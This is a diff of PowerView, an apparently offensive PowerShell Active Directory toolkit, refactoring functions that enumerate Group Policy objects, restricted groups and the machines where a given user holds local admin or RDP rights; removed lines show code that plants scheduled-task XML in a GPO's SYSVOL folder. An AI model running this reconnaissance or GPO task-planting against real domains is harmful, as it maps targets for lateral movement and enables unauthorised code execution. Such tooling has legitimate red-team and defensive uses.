-                $Net.MapNetworkDrive("N:", $Path, $False, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-                $TaskPath = "N:\Machine\Preferences\ScheduledTasks\"
-            }
-            else {
-                $TaskPath = $_.gpcfilesyspath + "\Machine\Preferences\ScheduledTasks\"
-            }
+                            # if this OU has GPO inheritence disabled, break so additional OUs aren't processed
+                            if ($_.gpoptions -eq 1) {
+                                $InheritanceDisabled = $True
+                            }
+                        }
+                    }
+                }
 
-            if($Remove) {
-                if(!(Test-Path "$TaskPath\ScheduledTasks.xml")) {
-                    Throw "Scheduled task doesn't exist at $TaskPath\ScheduledTasks.xml"
+                if ($TargetComputerName) {
+                    # find all the GPOs linked to the computer's site
+                    $ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName
+                    if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
+                        $SearcherArguments['Identity'] = $ComputerSite
+                        $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object {
+                            if($_.gplink) {
+                                # extract any GPO links for this particular site the computer is a part of
+                                $_.gplink.split('][') | ForEach-Object {
+                                    if ($_.startswith('LDAP')) {
+                                        $_.split(';')[0]
+                                    }
+                                }
+                            }
+                        }
+                    }
                 }
 
-                if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Removing schtask at $TaskPath\ScheduledTasks.xml")) {
-                    return
+                # find any GPOs linked to the user/computer's domain
+                $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC='))
+                $SearcherArguments.Remove('Identity')
+                $SearcherArguments.Remove('Properties')
+                $SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)"
+                $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object {
+                    if($_.gplink) {
+                        # extract any GPO links for this particular domain the computer is a part of
+                        $_.gplink.split('][') | ForEach-Object {
+                            if ($_.startswith('LDAP')) {
+                                $_.split(';')[0]
+                            }
+                        }
+                    }
                 }
+                Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths"
+
+                # restore the old properites to return, if set
+                if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+                else { $SearcherArguments.Remove('Properties') }
+                $SearcherArguments.Remove('Identity')
 
-                Remove-Item -Path "$TaskPath\ScheduledTasks.xml" -Force
+                $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
+                    # use the gplink as an ADS path to enumerate all GPOs for the computer
+                    $SearcherArguments['SearchBase'] = $_
+                    $SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)"
+                    Get-DomainObject @SearcherArguments | ForEach-Object {
+                        if ($PSBoundParameters['Raw']) {
+                            $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+                        }
+                        else {
+                            $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+                        }
+                        $_
+                    }
+                }
             }
             else {
-                if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Creating schtask at $TaskPath\ScheduledTasks.xml")) {
-                    return
+                $IdentityFilter = ''
+                $Filter = ''
+                $Identity | Where-Object {$_} | ForEach-Object {
+                    $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                    if ($IdentityInstance -match 'LDAP://|^CN=.*') {
+                        $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                    }
+                    elseif ($IdentityInstance -match '{.*}') {
+                        $IdentityFilter += "(name=$IdentityInstance)"
+                    }
+                    else {
+                        try {
+                            $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+                            $IdentityFilter += "(objectguid=$GuidByteString)"
+                        }
+                        catch {
+                            $IdentityFilter += "(displayname=$IdentityInstance)"
+                        }
+                    }
+                }
+                if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                    $Filter += "(|$IdentityFilter)"
                 }
-                
-                # create the folder if it doesn't exist
-                $Null = New-Item -ItemType Directory -Force -Path $TaskPath
 
-                if(Test-Path "$TaskPath\ScheduledTasks.xml") {
-                    Throw "Scheduled task already exists at $TaskPath\ScheduledTasks.xml !"
+                if ($PSBoundParameters['LDAPFilter']) {
+                    Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter"
+                    $Filter += "$LDAPFilter"
                 }
 
-                $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTasks.xml"
-            }
+                $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)"
+                Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)"
 
-            if($Credential) {
-                Write-Verbose "Removing mounted drive at N:\"
-                $Net = New-Object -ComObject WScript.Network
-                $Net.RemoveNetworkDrive("N:")
-            }
-        }
-        catch {
-            Write-Warning "Error for GPO $ProcessedGPOName : $_"
-            if($Credential) {
-                Write-Verbose "Removing mounted drive at N:\"
-                $Net = New-Object -ComObject WScript.Network
-                $Net.RemoveNetworkDrive("N:")
+                if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() }
+                else { $Results = $GPOSearcher.FindAll() }
+                $Results | Where-Object {$_} | ForEach-Object {
+                    if ($PSBoundParameters['Raw']) {
+                        # return raw result objects
+                        $GPO = $_
+                        $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+                    }
+                    else {
+                        if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) {
+                            $GPO = Convert-LDAPProperty -Properties $_.Properties
+                            try {
+                                $GPODN = $GPO.distinguishedname
+                                $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                                $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)"
+                                $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
+                            }
+                            catch {
+                                Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)"
+                            }
+                        }
+                        else {
+                            $GPO = Convert-LDAPProperty -Properties $_.Properties
+                        }
+                        $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+                    }
+                    $GPO
+                }
+                if ($Results) {
+                    try { $Results.dispose() }
+                    catch {
+                        Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_"
+                    }
+                }
+                $GPOSearcher.dispose()
             }
         }
     }
 }
 
 
-function Get-NetGPOGroup {
+function Get-DomainGPOLocalGroup {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences. Also return their user membership mappings, if they exist.
+
+Author: @harmj0y  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID  
+
+.DESCRIPTION
+
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files. For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present. Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+.PARAMETER Identity
+
+A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
 
-        Returns all GPOs in a domain that set "Restricted Groups" or use groups.xml on on target machines.
+.PARAMETER ResolveMembersToSIDs
 
-        Author: @harmj0y
-        License: BSD 3-Clause
-        Required Dependencies: Get-NetGPO, Get-GptTmpl, Get-GroupsXML, Convert-NameToSid, Convert-SidToName
-        Optional Dependencies: None
-    
-    .DESCRIPTION
+Switch. Indicates that any member names should be resolved to their domain SIDs.
 
-        First enumerates all GPOs in the current/target domain using Get-NetGPO with passed
-        arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
-        group membership is set through Group Policy Preferences groups.xml files. For any
-        GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
-        section data is processed if present. Any found Groups.xml files are parsed with
-        Get-GroupsXML and those memberships are returned as well.
+.PARAMETER Domain
 
-    .PARAMETER GPOname
+Specifies the domain to use for the query, defaults to the current domain.
 
-        The GPO name (GUID) to query for, wildcards accepted.
+.PARAMETER LDAPFilter
 
-    .PARAMETER DisplayName
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        The GPO display name to query for, wildcards accepted.
+.PARAMETER SearchBase
 
-    .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        The domain to query for GPOs, defaults to the current domain.
+.PARAMETER Server
 
-    .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
 
-    .PARAMETER ADSpath
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        The LDAP source to search through for GPOs.
-        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+.PARAMETER ResultPageSize
 
-    .PARAMETER ResolveMemberSIDs
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Switch. Try to resolve the SIDs of all found group members.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER UsePSDrive
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Switch. Mount any found policy files with temporary PSDrives.
+.PARAMETER Tombstone
 
-    .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        PS C:\> Get-NetGPOGroup
+.EXAMPLE
 
-        Returns all local groups set by GPO along with their members and memberof.
+Get-DomainGPOLocalGroup
 
-    .EXAMPLE
+Returns all local groups set by GPO along with their members and memberof.
 
-        PS C:\> Get-NetGPOGroup -ResolveMemberSIDs
+.EXAMPLE
 
-        Returns all local groups set by GPO along with their members and memberof,
-        and resolve any members to their domain SIDs.
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
 
-    .EXAMPLE
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
 
-        PS C:\> Get-NetGPOGroup -GPOName '{0847C615-6C4E-4D45-A064-6001040CC21C}'
+.EXAMPLE
 
-        Return any GPO-set groups for the GPO with the given name/GUID.
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
 
-    .EXAMPLE
+Return any GPO-set groups for the GPO with the given name/GUID.
 
-        PS C:\> Get-NetGPOGroup -DisplayName 'Desktops'
+.EXAMPLE
 
-        Return any GPO-set groups for the GPO with the given display name.
+Get-DomainGPOLocalGroup 'Desktops'
 
-    .LINK
+Return any GPO-set groups for the GPO with the given display name.
 
-        https://morgansimonsenblog.azurewebsites.net/tag/groups/
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+.LINK
+
+https://morgansimonsenblog.azurewebsites.net/tag/groups/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.GPOGroup')]
     [CmdletBinding()]
-    Param (
-        [String]
-        $GPOname = '*',
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String[]]
+        $Identity,
 
-        [String]
-        $DisplayName,
+        [Switch]
+        $ResolveMembersToSIDs,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $DomainController,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $ADSpath,
+        $SearchBase,
 
-        [Switch]
-        $ResolveMemberSIDs,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        [Switch]
-        $UsePSDrive,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
-
-    $Option = [System.StringSplitOptions]::RemoveEmptyEntries
-
-    # get every GPO from the specified domain with restricted groups set
-    Get-NetGPO -GPOName $GPOname -DisplayName $DisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize | ForEach-Object {
+        $ResultPageSize = 200,
 
-        $GPOdisplayName = $_.displayname
-        $GPOname = $_.name
-        $GPOPath = $_.gpcfilesyspath
-
-        $ParseArgs =  @{
-            'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
-            'UsePSDrive' = $UsePSDrive
-        }
-
-        # parse the GptTmpl.inf 'Restricted Groups' file if it exists
-        $Inf = Get-GptTmpl @ParseArgs
-
-        if($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-            $Memberships = @{}
+        [Switch]
+        $Tombstone,
 
-            # group the members/memberof fields for each entry
-            ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
-                $Group, $Relation = $Membership.Key.Split('__', $Option) | ForEach-Object {$_.Trim()}
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-                # extract out ALL members
-                $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+        $ConvertArguments = @{}
+        if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+
+        $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries
+    }
 
-                if($ResolveMemberSIDs) {
-                    # if the resulting member is username and not a SID, attempt to resolve it
-                    $GroupMembers = @()
-                    ForEach($Member in $MembershipValue) {
-                        if($Member -and ($Member.Trim() -ne '')) {
-                            if($Member -notmatch '^S-1-.*') {
-                                $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID
-                                if($MemberSID) {
-                                    $GroupMembers += $MemberSID
+    PROCESS {
+        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+        Get-DomainGPO @SearcherArguments | ForEach-Object {
+            $GPOdisplayName = $_.displayname
+            $GPOname = $_.name
+            $GPOPath = $_.gpcfilesyspath
+
+            $ParseArgs =  @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" }
+            if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
+
+            # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists
+            $Inf = Get-GptTmpl @ParseArgs
+
+            if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
+                $Memberships = @{}
+
+                # parse the members/memberof fields for each entry
+                ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
+                    $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()}
+                    # extract out ALL members
+                    $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
+
+                    if ($PSBoundParameters['ResolveMembersToSIDs']) {
+                        # if the resulting member is username and not a SID, attempt to resolve it
+                        $GroupMembers = @()
+                        ForEach ($Member in $MembershipValue) {
+                            if ($Member -and ($Member.Trim() -ne '')) {
+                                if ($Member -notmatch '^S-1-.*') {
+                                    $ConvertToArguments = @{'ObjectName' = $Member}
+                                    if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+                                    $MemberSID = ConvertTo-SID @ConvertToArguments
+
+                                    if ($MemberSID) {
+                                        $GroupMembers += $MemberSID
+                                    }
+                                    else {
+                                        $GroupMembers += $Member
+                                    }
                                 }
                                 else {
                                     $GroupMembers += $Member
                                 }
                             }
-                            else {
-                                $GroupMembers += $Member
-                            }
                         }
+                        $MembershipValue = $GroupMembers
                     }
-                    $MembershipValue = $GroupMembers
-                }
-
-                if(-not $Memberships[$Group]) {
-                    $Memberships[$Group] = @{}
-                }
-                if($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
-                $Memberships[$Group].Add($Relation, $MembershipValue)
-            }
 
-            ForEach ($Membership in $Memberships.GetEnumerator()) {
-                if($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
-                    # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
-                    $GroupSID = $Membership.Key.Trim('*')
-                    if($GroupSID -and ($GroupSID.Trim() -ne '')) {
-                        $GroupName = Convert-SidToName -SID $GroupSID
-                    }
-                    else {
-                        $GroupName = $False
+                    if (-not $Memberships[$Group]) {
+                        $Memberships[$Group] = @{}
                     }
+                    if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
+                    $Memberships[$Group].Add($Relation, $MembershipValue)
                 }
-                else {
-                    $GroupName = $Membership.Key
 
-                    if($GroupName -and ($GroupName.Trim() -ne '')) {
-                        if($Groupname -match 'Administrators') {
-                            $GroupSID = 'S-1-5-32-544'
-                        }
-                        elseif($Groupname -match 'Remote Desktop') {
-                            $GroupSID = 'S-1-5-32-555'
-                        }
-                        elseif($Groupname -match 'Guests') {
-                            $GroupSID = 'S-1-5-32-546'
-                        }
-                        elseif($GroupName.Trim() -ne '') {
-                            $GroupSID = Convert-NameToSid -Domain $Domain -ObjectName $Groupname | Select-Object -ExpandProperty SID
+                ForEach ($Membership in $Memberships.GetEnumerator()) {
+                    if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
+                        # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
+                        $GroupSID = $Membership.Key.Trim('*')
+                        if ($GroupSID -and ($GroupSID.Trim() -ne '')) {
+                            $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments
                         }
                         else {
-                            $GroupSID = $Null
+                            $GroupName = $False
                         }
                     }
+                    else {
+                        $GroupName = $Membership.Key
+
+                        if ($GroupName -and ($GroupName.Trim() -ne '')) {
+                            if ($Groupname -match 'Administrators') {
+                                $GroupSID = 'S-1-5-32-544'
+                            }
+                            elseif ($Groupname -match 'Remote Desktop') {
+                                $GroupSID = 'S-1-5-32-555'
+                            }
+                            elseif ($Groupname -match 'Guests') {
+                                $GroupSID = 'S-1-5-32-546'
+                            }
+                            elseif ($GroupName.Trim() -ne '') {
+                                $ConvertToArguments = @{'ObjectName' = $Groupname}
+                                if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+                                $GroupSID = ConvertTo-SID @ConvertToArguments
+                            }
+                            else {
+                                $GroupSID = $Null
+                            }
+                        }
+                    }
+
+                    $GPOGroup = New-Object PSObject
+                    $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+                    $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
+                    $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
+                    $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
+                    $GPOGroup | Add-Member Noteproperty 'Filters' $Null
+                    $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
+                    $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
+                    $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
+                    $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
+                    $GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+                    $GPOGroup
                 }
+            }
 
-                $GPOGroup = New-Object PSObject
-                $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
-                $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
-                $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
-                $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
-                $GPOGroup | Add-Member Noteproperty 'Filters' $Null
-                $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
-                $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
-                $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
-                $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
-                $GPOGroup
+            # now try to the parse group policy preferences file (Groups.xml) if it exists
+            $ParseArgs =  @{
+                'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
             }
-        }
 
-        $ParseArgs =  @{
-            'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
-            'UsePSDrive' = $UsePSDrive
-        }
+            Get-GroupsXML @ParseArgs | ForEach-Object {
+                if ($PSBoundParameters['ResolveMembersToSIDs']) {
+                    $GroupMembers = @()
+                    ForEach ($Member in $_.GroupMembers) {
+                        if ($Member -and ($Member.Trim() -ne '')) {
+                            if ($Member -notmatch '^S-1-.*') {
+
+                                # if the resulting member is username and not a SID, attempt to resolve it
+                                $ConvertToArguments = @{'ObjectName' = $Groupname}
+                                if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+                                $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member
 
-        Get-GroupsXML @ParseArgs | ForEach-Object {
-            if($ResolveMemberSIDs) {
-                $GroupMembers = @()
-                ForEach($Member in $_.GroupMembers) {
-                    if($Member -and ($Member.Trim() -ne '')) {
-                        if($Member -notmatch '^S-1-.*') {
-                            # if the resulting member is username and not a SID, attempt to resolve it
-                            $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID
-                            if($MemberSID) {
-                                $GroupMembers += $MemberSID
+                                if ($MemberSID) {
+                                    $GroupMembers += $MemberSID
+                                }
+                                else {
+                                    $GroupMembers += $Member
+                                }
                             }
                             else {
                                 $GroupMembers += $Member
                             }
                         }
-                        else {
-                            $GroupMembers += $Member
-                        }
                     }
+                    $_.GroupMembers = $GroupMembers
                 }
-                $_.GroupMembers = $GroupMembers
-            }
 
-            $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
-            $_ | Add-Member Noteproperty 'GPOName' $GPOName
-            $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
-            $_
+                $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+                $_ | Add-Member Noteproperty 'GPOName' $GPOName
+                $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
+                $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+                $_
+            }
         }
     }
 }
 
 
-function Find-GPOLocation {
+function Get-DomainGPOUserLocalGroupMapping {
 <#
-    .SYNOPSIS
-        
-        Enumerates the machines where a specific user/group is a member of a specific
-        local group, all through GPO correlation. 
+.SYNOPSIS
+
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation. If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup  
+
+.DESCRIPTION
+
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+    1.  resolving the user/group to its proper SID
+    2.  enumerating all groups the user/group is a current part of
+        and extracting all target SIDs to build a target SID list
+    3.  pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+        Get-DomainGPOLocalGroup
+    4.  matching the target SID list to the queried GPO SID list
+        to enumerate all GPO the user is effectively applied with
+    5.  enumerating all OUs and sites and applicable GPO GUIs are
+        applied to through gplink enumerating
+    6.  querying for all computers under the given OUs or sites
+
+If no user/group is specified, all user/group -> machine mappings discovered through
+GPO relationships are returned.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
+
+.PARAMETER LocalGroup
 
-        Author: @harmj0y
-        License: BSD 3-Clause
-        Required Dependencies: Get-NetUser, Get-NetGroup, Get-NetGPOGroup, Get-NetOU, Get-NetComputer, Get-ADObject, Get-NetSite
-        Optional Dependencies: None
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
 
-    .DESCRIPTION
+.PARAMETER Domain
 
-        Takes a user/group name and optional domain, and determines the computers in the domain 
-        the user/group has local admin (or RDP) rights to.
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
 
-        It does this by:
-            1.  resolving the user/group to its proper SID
-            2.  enumerating all groups the user/group is a current part of 
-                and extracting all target SIDs to build a target SID list
-            3.  pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
-                Get-NetGPOGroup
-            4.  matching the target SID list to the queried GPO SID list
-                to enumerate all GPO the user is effectively applied with
-            5.  enumerating all OUs and sites and applicable GPO GUIs are
-                applied to through gplink enumerating
-            6.  querying for all computers under the given OUs or sites
-        
-        If no user/group is specified, all user/group -> machine mappings discovered through
-        GPO relationships are returned.
+.PARAMETER Server
 
-    .PARAMETER UserName
+Specifies an Active Directory server (domain controller) to bind to.
 
-        A (single) user name name to query for access.
+.PARAMETER SearchScope
 
-    .PARAMETER GroupName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        A (single) group name name to query for access. 
+.PARAMETER ResultPageSize
 
-    .PARAMETER Domain
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Optional domain the user exists in for querying, defaults to the current domain.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER DomainController
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
 
-    .PARAMETER LocalGroup
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The local group to check access against.
-        Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
-        or a custom local SID. Defaults to local 'Administrators'.
+.PARAMETER Credential
 
-    .PARAMETER UsePSDrive
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Switch. Mount any found policy files with temporary PSDrives.
+.EXAMPLE
 
-    .PARAMETER PageSize
+Find-GPOLocation
 
-        The PageSize to set for the LDAP searcher object.
+Find all user/group -> machine relationships where the user/group is a member
+of the local administrators group on target machines.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-GPOLocation
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
 
-        Find all user/group -> machine relationships where the user/group is a member
-        of the local administrators group on target machines.
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-GPOLocation -UserName dfm
-        
-        Find all computers that dfm user has local administrator rights to in 
-        the current domain.
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
 
-    .EXAMPLE
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
 
-        PS C:\> Find-GPOLocation -UserName dfm -Domain dev.testlab.local
-        
-        Find all computers that dfm user has local administrator rights to in 
-        the dev.testlab.local domain.
+.EXAMPLE
 
-    .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
 
-        PS C:\> Find-GPOLocation -UserName jason -LocalGroup RDP
-        
-        Find all computers that jason has local RDP access rights to in the domain.
+.OUTPUTS
+
+PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
